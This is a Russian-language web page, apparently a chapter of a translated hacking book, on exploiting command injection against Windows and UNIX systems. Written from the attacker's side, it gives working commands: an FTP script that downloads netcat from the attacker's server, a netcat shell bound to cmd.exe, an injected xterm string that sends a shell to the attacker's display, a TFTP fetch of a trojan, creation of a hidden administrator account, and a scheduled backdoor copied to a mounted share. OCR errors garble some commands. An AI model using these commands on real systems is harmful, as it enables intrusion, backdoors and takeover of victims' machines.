На главную | Содержание | Назад | Вперёд
Наши друзья

 

 

Ввод данных и протокол FTP

Весьма удачным примером сценария является FTP-сценарий для Windows. FTP-клиент практически всегда устанавливается на Windows-системе по умолчанию. FTP-сценарии могут заставить FTP-клиент установить соединение с удаленным хостом и загрузить файл. После загрузки этот файл может быть исполнен.
echo anonyraous»ftp.txt echo root@»ftp. txt echo prompt>>ftp.txt echo get nc.exe>>ftp.txt
Это позволяет создать FTP-сценарий для загрузки программы netcat на ата­куемую машину. Для запуска сценария мы используем следующую команду.
ftp -s:ftp.txt <1Р-адрес моего сервера>
Как только netcat загружается на атакуемый компьютер, мы создаем потайной ход с помощью приведенной ниже команды. nc -L -р 53  -е cmd.exe
Это позволяет открыть порт (напоминаем, что порт 53 используется для переноса зоны DNS). Привязка устанавливается к файлу cmd. exe. После установки соедине­ния мы получаем потайной ход.
Используя только внесение команд, мы установили потайной ход в системе. На 8 показано подключение хакера к порту для проверки доступа к командному интерпретатору. Хакеру выдается стандартное приглашение DOS на ввод команды. Мы добились успеха!
Внесение данных и программа xterm
Передача программы для установки потайного хода на удаленную систему явля­ется достаточно сложной задачей. Такие действия практически всегда оставляют на атакуемой машине файлы и следы, выявляемые средствами аудита (т.е. что-то, что необходимо удалить). Иногда атаку на удаленную систему проще провести с по­мощью программ, которые уже установлены на этой системе. На многих UNIX-компьютерах установлена система X Windows, и получить доступ к командному

интерпретатору из системы X намного проще, чем устанавливать с нуля потайной ход. С помощью программы xterm и локального Х-сервера удавленный командный интерпретатор может быть выведен на рабочий стол хакера.
Рассмотрим уязвимый сценарий PHP-приложения, который позволяет передать пользовательские данные командному интерпретатору с помощью следующей команды. passthru ( "find . -print  | xargs cat I grep $test" ) ;
Если злоумышленник передает следующую строку входных данных
;/usr/X/bin/xterm -ut -display 192 .168 .0.4: СО
где вместо IP-адреса 192.168.0.1 может использоваться любой адрес (который должен указать на Х-сервер хакера), то создается удаленный сеанс связи xterm.
Хакер отправляет строку данных и ждет. Проходят секунды. Внезапно на экране появляется окно программы xterm, сначала оно пустое, а затем заполняется тек­стом. Является ли это приглашением на ввод хэшированного пароля суперпользова­теля? На 9 злоумышленник отправил команду id, чтобы определить, от имени какого пользователя работает программа атаки.
Внесение данных для протокола TFTP
Протокол TFTP — это очень простой протокол для обмена файлами. Для прове­дения атаки по протоколу TFTP у хакера должен быть где-то запущен TFTP-сервер, который доступен для атакуемой системы. Атакуемая система организует соедине­ние к TFTP-серверу. Весьма логично оставить там программу для создания потайно­го хода, которая будет ожидать соединения и будет готова к установке. Команда для реализации этого плана должна выглядеть примерно следующим образом (на систе­мах Windows учитываем преобразование символов).
C:\\WINNT\\system32\\tftp   -i   <1Р-адрес.компьютера.хакера>   GET trojan.exe
В этом примере файлом trojan.exe может быть любой файл, который хакер хочет загрузить из хранилища. TFTP — удобное средство для обмена файлами. Этот протокол позволяет без особых усилий загружать программы на маршрутизаторы, коммутаторы и кабельные модемы. С недавних пор во многих поэтапных атаках ста­ли использоваться возможности протокола TFTP.
Добавление нового пользователя
Установка потайного хода может и не потребоваться. Просто добавив новую учетную запись, злоумышленник сможет получить необходимый доступ. Знамени­тый пример (по крайней мере, его даже печатали на футболках на конференции ха­керов Def-Con) — добавление хакером Кэвином Митником (Kevin Mitnick) учетной записи toor (это слово root, написанное наоборот) на атакуемые хосты. Используя внесение команд при работе с правами привилегированного процесса, хакер без осо­бых проблем может добавлять новые учетные записи в систему.
Вновь прибегая к Windows NT в качестве примера, для добавления учетной запи­си можно воспользоваться следующей командой.
C:\\WINNT\system32\\net.exe   user  haxOr  haxOr /add
Мы можем даже добавить пользователя в группу администраторов.
C:\\WINNT\system32\\net.exe   localgroup  Administrators   haxOr /add
Планирование запуска процессов
После добавления учетной записи на компьютер становиться возможным рас­планировать выполнение задач на удаленном компьютере. Для этого обычно ис­пользуют утилиту at. В Windows -системе хакер может смонтировать диск на уда­ленную систему и установить программу потайного хода. Если с удаленной систе­

мой установлен сеанс связи с правами системного администратора, то хакер просто выполняет команду at, указывая удаленную цель атаки.
Рассмотрим пример монтирования диска, добавления исполняемого файла и планирования запуска этой программы на удаленной системе.
C:\haxOr>net  use   Z:    \\192.168.О.1\С$  haxOr /uihaxOr C:\haxOr>copy backdoor.exe Z:\
C:\haxOr>at   \\192.168.0.1\C$   12:00A Z:\backdoor.exe
План хакера сработает в полночь. С помощью удаленного вызова процедур Windows-компьютеры предоставляют хакеру полное управление после установки сеанса с правами системного администратора5.
Вывод: передача команд командному интерпретатору и связанные с ней атаки являются очень мощным оружием хакеров.

 

На главную | Содержание | Назад | Вперёд
 
Яндекс.Метрика